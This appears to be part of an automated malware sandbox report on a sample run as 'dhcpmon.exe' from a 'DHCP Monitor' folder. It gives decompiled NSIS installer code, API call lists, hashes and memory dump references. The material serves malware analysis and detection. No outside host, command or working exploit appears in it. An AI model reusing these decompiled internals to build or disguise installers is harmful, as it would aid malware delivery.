                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_abort
                                                                    • String ID:
                                                                    • API String ID: 88804580-0
                                                                    • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                    • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                    0x004025ba
                                                                    0x004025bf
                                                                    0x004025cb
                                                                    0x004025d0
                                                                    0x004025d5
                                                                    0x004025d7
                                                                    0x004025e2
                                                                    0x004025d9
                                                                    0x004025d9
                                                                    0x00000000
                                                                    0x004025d9
                                                                    0x004025cd
                                                                    0x004025cd
                                                                    0x004025cf
                                                                    0x004025cf

                                                                    APIs
                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                      • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                    • String ID:
                                                                    • API String ID: 1761009282-0
                                                                    • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                    • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: dhcpmon.exe PID: 6744 Parent PID: 1104 dhcpmon.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe\" 0";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe\" 0" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Program Files (x86)\\DHCP Monitor";
													if(lstrcmpiA(_t157, "C:\\Program Files (x86)\\DHCP Monitor") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                    0x00403496
                                                                    0x0040349a
                                                                    0x004034a2
                                                                    0x004034a6
                                                                    0x004034ab
                                                                    0x004034b7
                                                                    0x004034c0
                                                                    0x004034c5
                                                                    0x004034c8
                                                                    0x004034cf
                                                                    0x004034d6
                                                                    0x004034d6
                                                                    0x004034cf
                                                                    0x004034d8
                                                                    0x004034dd
                                                                    0x004034de
                                                                    0x004034ea
                                                                    0x004034ee
                                                                    0x004034f4
                                                                    0x00403502
                                                                    0x00403507
                                                                    0x0040350e
                                                                    0x00403512
                                                                    0x00403516
                                                                    0x00403518
                                                                    0x00403518
                                                                    0x00403516
                                                                    0x00403520
                                                                    0x00403527
                                                                    0x0040352d
                                                                    0x00403543
                                                                    0x00403553
                                                                    0x00403558
                                                                    0x0040355e
                                                                    0x00403565
                                                                    0x00403571
                                                                    0x0040357b
                                                                    0x0040357d
                                                                    0x0040357f
                                                                    0x00403584
                                                                    0x00403584
                                                                    0x00403594
                                                                    0x0040359a
                                                                    0x00403663
                                                                    0x00403663
                                                                    0x00403665
                                                                    0x00403667
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035a3
                                                                    0x004035a6
                                                                    0x004035ae
                                                                    0x004035ae
                                                                    0x004035b1
                                                                    0x004035b6
                                                                    0x004035b8
                                                                    0x004035b8
                                                                    0x004035b9
                                                                    0x004035b9
                                                                    0x004035be
                                                                    0x004035c1
                                                                    0x00403653
                                                                    0x00403658
                                                                    0x0040365d
                                                                    0x00403660
                                                                    0x00403662
                                                                    0x00403662
                                                                    0x00403662
                                                                    0x00000000
                                                                    0x004035c7
                                                                    0x004035c7
                                                                    0x004035c8
                                                                    0x004035cb
                                                                    0x004035e3
                                                                    0x0040360e
                                                                    0x00403610
                                                                    0x00403623
                                                                    0x0040364e
                                                                    0x00403651
                                                                    0x0040366f
                                                                    0x00403672
                                                                    0x0040367b
                                                                    0x00403680
                                                                    0x00403686
                                                                    0x00403691
                                                                    0x00403693
                                                                    0x00403698
                                                                    0x0040369a
                                                                    0x004036f2
                                                                    0x004036f7
                                                                    0x00403701
                                                                    0x00403708
                                                                    0x0040370c
                                                                    0x004037a0
                                                                    0x004037a0
                                                                    0x004037a5
                                                                    0x004037ab
                                                                    0x004037b0
                                                                    0x004038d4
                                                                    0x004038da
                                                                    0x00403956
                                                                    0x00403956
                                                                    0x0040395b
                                                                    0x0040395e
                                                                    0x00403960
                                                                    0x00403960
                                                                    0x00403968
                                                                    0x00403968
                                                                    0x004038ea
                                                                    0x004038f2
                                                                    0x004038f4
                                                                    0x004038f5
                                                                    0x00403902
                                                                    0x00403915
                                                                    0x0040391d
                                                                    0x00403921
                                                                    0x00403921
                                                                    0x00403929
                                                                    0x0040392e
                                                                    0x00403935
                                                                    0x00403943
                                                                    0x00403945
                                                                    0x0040394b
                                                                    0x0040394d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403937
                                                                    0x0040393d
                                                                    0x0040393f
                                                                    0x00403941
                                                                    0x0040394f
                                                                    0x00403951
                                                                    0x00000000
                                                                    0x00403951
                                                                    0x00000000
                                                                    0x00403941
                                                                    0x00403935
                                                                    0x004037bf
                                                                    0x004037c6
                                                                    0x004037c6
                                                                    0x00403718
                                                                    0x00403790
                                                                    0x00403790
                                                                    0x0040379c
                                                                    0x00000000
                                                                    0x0040379c
                                                                    0x00403721
                                                                    0x00403725
                                                                    0x0040375b
                                                                    0x0040375b
                                                                    0x0040375d
                                                                    0x00403765
                                                                    0x004037d7
                                                                    0x004037d9
                                                                    0x004037e0
                                                                    0x004037e8
                                                                    0x004037e8
                                                                    0x004037f3
                                                                    0x004037f8
                                                                    0x00403807
                                                                    0x0040380b
                                                                    0x0040380c
                                                                    0x00403815
                                                                    0x0040380e
                                                                    0x0040380e
                                                                    0x0040380e
                                                                    0x0040381b
                                                                    0x00403821
                                                                    0x00403827
                                                                    0x0040382f
                                                                    0x0040382f
                                                                    0x0040383d
                                                                    0x00403842
                                                                    0x00403854
                                                                    0x0040385c
                                                                    0x00403862
                                                                    0x0040386e
                                                                    0x00403874
                                                                    0x0040387e
                                                                    0x00403894
                                                                    0x004038a5
                                                                    0x004038ab
                                                                    0x004038b2
                                                                    0x004038b5
                                                                    0x004038bb
                                                                    0x004038bb
                                                                    0x004038b2
                                                                    0x004038bf
                                                                    0x004038c5
                                                                    0x004038c5
                                                                    0x004038ca
                                                                    0x004038ca
                                                                    0x00000000
                                                                    0x00403807
                                                                    0x00403767
                                                                    0x00403769
                                                                    0x00403774
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040377c
                                                                    0x00403787
                                                                    0x0040378c
                                                                    0x00000000
                                                                    0x0040378c
                                                                    0x00403750
                                                                    0x00403752
                                                                    0x00403756
                                                                    0x00403759
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403759
                                                                    0x00000000
                                                                    0x00403752
                                                                    0x004036a2
                                                                    0x004036ae
                                                                    0x004036b3
                                                                    0x004036b8
                                                                    0x004036ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004036c2
                                                                    0x004036ca
                                                                    0x004036db
                                                                    0x004036e3
                                                                    0x004036e5
                                                                    0x004036ea
                                                                    0x004036ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004036ec
                                                                    0x00000000
                                                                    0x00403651
                                                                    0x00403612
                                                                    0x00403615
                                                                    0x00403618
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x00000000
                                                                    0x0040361e
                                                                    0x0040361a
                                                                    0x0040361c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040361c
                                                                    0x004035cd
                                                                    0x004035d0
                                                                    0x004035d3
                                                                    0x004035d9
                                                                    0x004035d9
                                                                    0x00000000
                                                                    0x004035d9
                                                                    0x004035d5
                                                                    0x004035d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035a8
                                                                    0x004035a8
                                                                    0x004035a8
                                                                    0x004035a9
                                                                    0x004035a9
                                                                    0x00000000
                                                                    0x004035a8
                                                                    0x00000000

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 004034AB
                                                                    • GetVersion.KERNEL32 ref: 004034B1
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                    • OleInitialize.OLE32(00000000), ref: 00403527
                                                                    • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                    • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                    • CharNextA.USER32(00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000020,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                      • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                      • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                      • Part of subcall function 00403A60: lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90), ref: 00403B50
                                                                      • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                      • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00403B6E
                                                                      • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                      • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                      • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002E0,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                      • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002C4,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                    • ExitProcess.KERNEL32 ref: 004037C6
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                    • ExitWindowsEx.USER32 ref: 00403945
                                                                    • ExitProcess.KERNEL32 ref: 00403968
                                                                      • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                    • String ID: "$"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$.tmp$1033$C:\Program Files (x86)\DHCP Monitor$C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 538718688-3690246468
                                                                    • Opcode ID: 59846cb0e328dd3137fe6862d866a3f935b1e29978b84714f7053ce702f1765b
                                                                    • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                    • Opcode Fuzzy Hash: 59846cb0e328dd3137fe6862d866a3f935b1e29978b84714f7053ce702f1765b
                                                                    • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
